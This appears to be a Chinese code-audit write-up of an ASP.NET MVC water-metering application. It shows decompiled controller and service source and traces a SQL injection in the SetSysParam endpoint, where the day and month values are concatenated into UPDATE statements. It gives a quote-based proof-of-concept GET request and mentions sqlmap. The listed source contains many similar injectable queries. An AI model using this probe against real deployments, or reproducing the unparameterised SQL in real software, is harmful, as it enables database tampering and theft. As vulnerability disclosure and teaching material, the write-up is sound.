ASP.NET代码审计 MVC架构 SQL注入漏洞
接口路由
/SysConfig/SetSysParamSysConfigController.cs代码
using System;
using System.Data;
using System.Text;
using System.Web;
using System.Web.Mvc;
using IMP.PageUtils;
using IMP.Services;
using IMP.Utilities;
using IMP.WebCommon;
using IWater.Lib.Modules;namespace IMP.Controllers;public class SysConfigController : Controller
{private static string strDisposeAlarmCookieName = "";private static bool isExisteTable = false;private static int intBackYear;public ActionResult Index(){return View();}public JsonResult GetSysConfig(){SysConfig data = new SysConfig();return Json(data, JsonRequestBehavior.AllowGet);}public string SetConfig(string UseAlarm, string UseVoice, string AutoPopup){SystemInfo.UseAlarm = UseAlarm;SystemInfo.UseVoice = UseVoice;SystemInfo.AutoPopup = AutoPopup;return "";}public JsonResult GetComState(){string commState = (StartModule.TCPChannel.Enable ? "正常" : "中断");SysConfig sysConfig = new SysConfig();sysConfig.CommState = commState;return Json(sysConfig, JsonRequestBehavior.AllowGet);}public string GetAlarm(){string text = "";if (strDisposeAlarmCookieName == ""){strDisposeAlarmCookieName = CookieHelper.GetCookieName(base.HttpContext.Request, "DisposeAlarmTime");}string text2 = DateTime.Now.AddDays(-3.0).ToString("yyyy-MM-dd HH:mm:ss");if (SessionUtils.GetSession("QueryAlarmStartTime") != null){text2 = SessionUtils.GetSession("QueryAlarmStartTime").ToString();}else{string strName = HttpUtility.UrlEncode(strDisposeAlarmCookieName);if (CookieHelper.GetCookie(strName) != null){text2 = HttpUtility.UrlDecode(CookieHelper.GetCookie(strName));}SessionUtils.SetSession("QueryAlarmStartTime", text2);}DateTime now = DateTime.Now;DeviceManager deviceManager = new DeviceManager();DataTable globalAlarm = deviceManager.GetGlobalAlarm(now, text2);if (globalAlarm == null){return "{CookieName:'" + strDisposeAlarmCookieName + "',AlarmRecords:''}";}StringBuilder stringBuilder = new StringBuilder();stringBuilder.Append("{CookieName:'" + strDisposeAlarmCookieName + "',AlarmRecords:'");for (int i = 0; i < globalAlarm.Rows.Count; i++){stringBuilder.Append(globalAlarm.Rows[i]["单位名称"].ToString());stringBuilder.Append("&");stringBuilder.Append(globalAlarm.Rows[i]["测点名称"].ToString());stringBuilder.Append("&");stringBuilder.Append(globalAlarm.Rows[i]["报警日期"].ToString());stringBuilder.Append("&");stringBuilder.Append(globalAlarm.Rows[i]["报警类型"].ToString());stringBuilder.Append("&");stringBuilder.Append(globalAlarm.Rows[i]["报警描述"].ToString());if (i != globalAlarm.Rows.Count - 1){stringBuilder.Append("$");}else{SessionUtils.SetSession("QueryAlarmStartTime", globalAlarm.Rows[i]["报警日期"].ToString());}}stringBuilder.Append("'}");return stringBuilder.ToString();}public ActionResult SysParam(){DataTable sysParam = new SysManager().GetSysParam();string text = "";for (int i = 0; i < sysParam.Rows.Count; i++){text = sysParam.Rows[i]["参数名称"].ToString();string text2 = text;string text3 = text2;if (!(text3 == "日抄表时间")){if (text3 == "月抄表时间"){base.ViewBag.MonthReadDate = sysParam.Rows[i]["参数值"].ToString();}}else{base.ViewBag.DayReadDate = sysParam.Rows[i]["参数值"].ToString();}}return View();}public string SetSysParam(string day, string month){return new SysManager().SetSysParam(day, month);}
}
关键代码
public string SetSysParam(string day, string month){return new SysManager().SetSysParam(day, month);}SetSysParam(string day, string month) 写了一个 SetSysParam() 方法传入 day 和 month 两个参数,方法内部创建了一个 SysManager 类的实例去接收参数执行,去找 SysManager 类文件,就是 SysManager.cs 文件
SysManager.cs代码
using System;
using System.Data;
using System.Text;
using IMP.Utilities;namespace IMP.Services;public class SysManager
{private IDbProvider dbHelper => DbFactoryProvider.GetProvider(CurrentDbType.SqlServer, SystemInfo.DbConection);public DataTable GetOperators(string oprId){string strSql = "Select u.ID,用户名,角色名称 as 角色,m.名称 as 管理,u.DELETEMARK,u.角色ID,u.管理ID From 用户信息 u left join 角色信息 r on u.角色ID=r.ID left join 管理信息 m on u.管理ID=m.ID";if (!string.IsNullOrEmpty(oprId)){strSql = "Select u.ID,用户名,角色名称 as 角色,m.名称 as 管理,u.DELETEMARK,u.角色ID,u.管理ID From 用户信息 u left join 角色信息 r on u.角色ID=r.ID left join 管理信息 m on u.管理ID=m.ID Where u.ID=" + oprId;}return dbHelper.Fill(strSql);}public DataTable GetOperatorBySearch(string query){string sqlCmd = "select ID,用户名 from 用户信息 where dbo.fn_GetQuanPin(用户名) like '" + query + "%' or 用户名 like '%" + query + "%'";return dbHelper.Fill(sqlCmd);}public DataTable GetRoles(){string sqlCmd = "Select * From 角色信息 ";return dbHelper.Fill(sqlCmd);}public DataTable GetDepartments(){string sqlCmd = "Select * From 管理信息";return dbHelper.Fill(sqlCmd);}public string AddOperator(string operId, string UserName, string RoleName, string Company, string CustomDev, string DevList){string writeJson = "{\"Result\":\"false\",\"Msg\":\"\"}";try{string sqlQuery = "Select Id From 用户信息 Where 用户名='" + UserName + "'";if (!operId.Equals("0")){sqlQuery = "Select Id From 用户信息 Where 用户名='" + UserName + "' And Id!=" + operId;}if (dbHelper.Fill(sqlQuery).Rows.Count > 0){writeJson = "{\"Result\":\"false\",\"Msg\":\"用户名已经存在!\"}";}else{sqlQuery = "Insert Into 用户信息(用户名,密码,角色ID,管理ID,注册时间,DELETEMARK,自定义测点)Values('" + UserName + "','123'," + RoleName + "," + Company + ",'" + DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss") + "',0,'" + CustomDev + "')";if (!operId.Equals("0")){sqlQuery = "Update 用户信息 set 用户名='" + UserName + "',角色ID=" + RoleName + ",管理ID=" + Company + ",自定义测点='" + CustomDev + "' Where Id=" + operId;}int n = dbHelper.ExecuteNonQuery(sqlQuery);if (operId.Equals("0")){sqlQuery = "Select Max(Id) as Id From 用户信息";DataTable dtId = dbHelper.Fill(sqlQuery);if (dtId.Rows.Count > 0){operId = dtId.Rows[0]["Id"].ToString();}}if (CustomDev.Equals("是")){sqlQuery = "Select * From 用户测点关系 Where 用户ID=" + operId;if (dbHelper.Fill(sqlQuery).Rows.Count > 0){sqlQuery = "Update 用户测点关系 Set 用户ID=" + operId + ",设备ID='" + DevList + "',管理ID=" + Company + " Where 用户ID=" + operId;dbHelper.ExecuteNonQuery(sqlQuery);}else{sqlQuery = "Insert Into 用户测点关系(用户ID,设备ID,管理ID)Values(" + operId + ",'" + DevList + "'," + Company + ")";dbHelper.ExecuteNonQuery(sqlQuery);}}writeJson = ((n > 0) ? "{\"Result\":\"true\",\"Msg\":\"插入成功!\"}" : ((!operId.Equals("0")) ? "{\"Result\":\"false\",\"Msg\":\"更新失败!\"}" : "{\"Result\":\"false\",\"Msg\":\"插入失败!\"}"));}return writeJson;}catch (Exception ex){return "{\"Result\":\"false\",\"Msg\":\"" + ex.Message + "\"}";}}public string AddRole(string roleId, string RoleName){string writeJson = "{\"Result\":\"false\",\"Msg\":\"\"}";try{string sql = "Select * From 角色信息 Where 角色名称='" + RoleName + "'";if (!roleId.Equals("0")){sql = "Select * From 角色信息 Where id!=" + roleId + " And 角色名称='" + RoleName + "'";}if (dbHelper.Fill(sql).Rows.Count > 0){writeJson = "{\"Result\":\"false\",\"Msg\":\"角色名称重复\"}";}else{sql = "Insert Into 角色信息(角色名称) values('" + RoleName + "')";if (!roleId.Equals("0")){sql = "Update 角色信息 set 角色名称='" + RoleName + "' Where id=" + roleId;}if (dbHelper.ExecuteNonQuery(sql) > 0){writeJson = "{\"Result\":\"true\",\"Msg\":\"添加成功\"}";}else{writeJson = "{\"Result\":\"true\",\"Msg\":\"新增失败\"}";if (!roleId.Equals("0")){writeJson = "{\"Result\":\"true\",\"Msg\":\"更新失败\"}";}}}}catch (Exception ex){writeJson = "{\"Result\":\"false\",\"Msg\":\"" + ex.Message + "\"}";}return writeJson;}public string GetModuleTree(){string sql = "Select * From 菜单项管理 Where 父菜单ID=0 Order by 顺序号";DataTable dt = dbHelper.Fill(sql);StringBuilder builder = new StringBuilder();for (int i = 0; i < dt.Rows.Count; i++){builder.Append("{\"text\":\"").Append(dt.Rows[i]["菜单名称"].ToString()).Append("\",");builder.Append("\"id\":\"").Append(dt.Rows[i]["id"].ToString()).Append("\",");sql = string.Concat("Select * From 菜单项管理 where 父菜单ID=", dt.Rows[i]["Id"], " Order by 顺序号");DataTable dtSub = dbHelper.Fill(sql);if (dtSub.Rows.Count > 0){builder.Append("\"state\":\"closed\",");}builder.Append("\"iconCls\":\"icon-org\",\"children\":[");for (int j = 0; j < dtSub.Rows.Count; j++){builder.Append("{\"text\":\"").Append(dtSub.Rows[j]["菜单名称"].ToString()).Append("\",");builder.Append("\"id\":\"").Append(dtSub.Rows[j]["id"].ToString()).Append("\",");builder.Append("\"iconCls\":\"icon-org\"}");if (j < dtSub.Rows.Count - 1){builder.Append(",");}}builder.Append("]}");if (i < dt.Rows.Count - 1){builder.Append(",");}}string jsonStr = "{\"id\":\"0\",\"text\":\"" + SystemInfo.CustomerCompanyName + "\",\"iconCls\":\"icon-org\",\"children\":[" + builder.ToString() + "]}";return "[" + jsonStr + "]";}public string GetModuleByRoleId(string keyId){string sql = "Select * From 角色菜单关系表 Where 角色ID=" + keyId;DataTable dt = dbHelper.Fill(sql);StringBuilder builder = new StringBuilder();for (int i = 0; i < dt.Rows.Count; i++){builder.Append(dt.Rows[i]["菜单ID"]);if (i < dt.Rows.Count - 1){builder.Append(",");}}return builder.ToString();}public string SetRoleModulePermission(string roleId, string grantIds, string revokeIds){string json = "{\"Data\":\"0\"}";if (!string.IsNullOrEmpty(grantIds)){try{string sql = "Select * From 角色菜单关系表 Where 角色ID=" + roleId + " and 菜单ID=" + grantIds;if (dbHelper.Fill(sql).Rows.Count > 0){json = "{\"Data\":\"1\"}";}else{sql = "Insert into 角色菜单关系表(角色ID,菜单ID)values(" + roleId + "," + grantIds + ")";json = ((dbHelper.ExecuteNonQuery(sql) <= 0) ? "{\"Data\":\"0\"}" : "{\"Data\":\"1\"}");}}catch (Exception){json = "{\"Data\":\"-1\"}";}}if (!string.IsNullOrEmpty(revokeIds)){try{string sql = "Select * From 角色菜单关系表 Where 角色ID=" + roleId + " and 菜单ID=" + revokeIds;if (dbHelper.Fill(sql).Rows.Count > 0){sql = "Delete 角色菜单关系表 Where 角色ID=" + roleId + " and 菜单ID=" + revokeIds;json = ((dbHelper.ExecuteNonQuery(sql) <= 0) ? "{\"Data\":\"0\"}" : "{\"Data\":\"1\"}");}else{json = "{\"Data\":\"1\"}";}}catch (Exception){json = "{\"Data\":\"-1\"}";}}return json;}public DataTable GetModules(string moduleIds){string sql;if (!string.IsNullOrEmpty(moduleIds)){sql = "Select * From 菜单项管理 Where 父菜单ID=" + moduleIds + " order by 顺序号";return dbHelper.Fill(sql);}sql = "Select * From 菜单项管理 Where 父菜单ID=0 order by 顺序号";return dbHelper.Fill(sql);}public DataTable GetParentModules(){string sql = "Select * From 菜单项管理 Where 父菜单ID=0 order by 顺序号";DataTable dt = dbHelper.Fill(sql);dt.Rows.Add(0, 0, SystemInfo.CustomerCompanyName, "", 0, "", "");return dt;}public string AddOrUpdateModule(string mId, string ModuleName, string Url, string Icon, string Parent, string order){string writeJson = "{\"Result\":\"false\",\"Msg\":\"\"}";try{string sql = "Select * From 菜单项管理 Where 菜单名称='" + ModuleName + "'";if (!mId.Equals("0")){sql = "Select * From 菜单项管理 Where id!=" + mId + " And 菜单名称='" + ModuleName + "'";}if (dbHelper.Fill(sql).Rows.Count > 0){writeJson = "{\"Result\":\"false\",\"Msg\":\"模块(菜单)名称重复\"}";}else{if (string.IsNullOrEmpty(order)){order = "0";}sql = "Insert Into 菜单项管理(菜单名称,父菜单ID,入口URL,顺序号,图标) values('" + ModuleName + "'," + Parent + ",'" + Url + "'," + order + ",'" + Icon + "')";if (!mId.Equals("0")){sql = "Update 菜单项管理 set 菜单名称='" + ModuleName + "',父菜单ID=" + Parent + ",入口URL='" + Url + "',顺序号=" + order + ",图标='" + Icon + "' Where id=" + mId;}if (dbHelper.ExecuteNonQuery(sql) > 0){writeJson = "{\"Result\":\"true\",\"Msg\":\"添加成功\"}";}else{writeJson = "{\"Result\":\"true\",\"Msg\":\"新增失败\"}";if (!mId.Equals("0")){writeJson = "{\"Result\":\"true\",\"Msg\":\"更新失败\"}";}}}}catch (Exception ex){writeJson = "{\"Result\":\"false\",\"Msg\":\"" + ex.Message + "\"}";}return writeJson;}public string ChangPwd(string loginId, string OldPwd, string NewPwd){string writeJson = "{\"Result\":\"false\",\"Msg\":\"\"}";try{string sql = "Select * From 用户信息 Where id=" + loginId + " And 密码='" + OldPwd + "'";if (dbHelper.Fill(sql).Rows.Count > 0){sql = "Update 用户信息 Set 密码='" + NewPwd + "' Where Id=" + loginId;if (dbHelper.ExecuteNonQuery(sql) > 0){return "{\"Result\":\"true\",\"Msg\":\"修改成功!\"}";}return "{\"Result\":\"true\",\"Msg\":\"修改失败!\"}";}return "{\"Result\":\"false\",\"Msg\":\"用户输入的旧密码错误!\"}";}catch (Exception ex){return "{\"Result\":\"false\",\"Msg\":\"" + ex.Message + "\"}";}}public DataTable GetSysParam(){string sql = "Select * From 系统参数";return dbHelper.Fill(sql);}public string SetSysParam(string day, string month){string json = "{\"Result\":false,\"Msg\":\"\"}";try{string sql = "Update 系统参数 Set 参数值='" + day + "' Where 参数名称='日抄表时间';";sql = sql + "Update 系统参数 Set 参数值='" + month + "' Where 参数名称='月抄表时间';";if (dbHelper.ExecuteNonQuery(sql) > 0){return "{\"Result\":true,\"Msg\":\"设置成功\"}";}return "{\"Result\":false,\"Msg\":\"设置失败\"}";}catch (Exception ex){return "{\"Result\":false,\"Msg\":\"" + ex.Message + "\"}";}}public string GetCustomeDev(string id){string sql = "Select * From 用户信息 Where Id=" + id;string returnJson = "{\"custom\":\"否\",\"data\":\"\"}";DataTable dt = dbHelper.Fill(sql);if (dt.Rows.Count > 0){string custom = dt.Rows[0]["自定义测点"].ToString();if (!string.IsNullOrEmpty(custom)){if (custom.Equals("否")){returnJson = "{\"custom\":\"否\",\"data\":\"\"}";}else if (custom.Equals("是")){sql = "Select * From 用户测点关系 Where 用户ID=" + id;DataTable dtL = dbHelper.Fill(sql);returnJson = ((dtL.Rows.Count <= 0) ? "{\"custom\":\"否\",\"data\":\"\"}" : ("{\"custom\":\"是\",\"data\":\"" + dtL.Rows[0]["设备ID"].ToString() + "\"}"));}else{returnJson = "{\"custom\":\"否\",\"data\":\"\"}";}}else{returnJson = "{\"custom\":\"否\",\"data\":\"\"}";}}return returnJson;}public string GetDevList(string userId){DataTable dtStation = new DataTable();string strSql = "Select * From 用户信息 Where Id=" + userId;DataTable dtU = dbHelper.Fill(strSql);string where = " ";if (dtU.Rows.Count > 0){string custom = dtU.Rows[0]["自定义测点"].ToString();if (!string.IsNullOrEmpty(custom) && custom.Equals("是")){strSql = "Select * From 用户测点关系 Where 用户ID=" + userId;DataTable dtR = dbHelper.Fill(strSql);if (dtR.Rows.Count > 0){string devList = dtR.Rows[0]["设备ID"].ToString();if (!string.IsNullOrEmpty(devList)){where = " And Id in(" + devList + ") ";}}}}strSql = "select * from 设备信息 where 是否启用='是' " + where;dtStation = dbHelper.Fill(strSql);StringBuilder builder = new StringBuilder();for (int i = 0; i < dtStation.Rows.Count; i++){builder.Append("{\"text\":\"").Append(dtStation.Rows[i]["名称"].ToString()).Append("\",");builder.Append("\"id\":\"").Append(dtStation.Rows[i]["ID"].ToString()).Append("\",");builder.Append("\"iconCls\":\"icon-watermeter\"}");if (i < dtStation.Rows.Count - 1){builder.Append(",");}}string jsonStr = builder.ToString();return "[" + jsonStr + "]";}
}
关键代码
public string SetSysParam(string day, string month){string json = "{\"Result\":false,\"Msg\":\"\"}";try{string sql = "Update 系统参数 Set 参数值='" + day + "' Where 参数名称='日抄表时间';";sql = sql + "Update 系统参数 Set 参数值='" + month + "' Where 参数名称='月抄表时间';";if (dbHelper.ExecuteNonQuery(sql) > 0){return "{\"Result\":true,\"Msg\":\"设置成功\"}";}return "{\"Result\":false,\"Msg\":\"设置失败\"}";}catch (Exception ex){return "{\"Result\":false,\"Msg\":\"" + ex.Message + "\"}";}}这里接收上面传进来的 day 和 month 参数直接拼接sql语句照成sql注入漏洞
POC
GET /SysConfig/SetSysParam?day=1%27&month=1 HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36单引号报错语法错误
sqlmap
如果你听到这里,如果你依然放弃,那这就是爱情……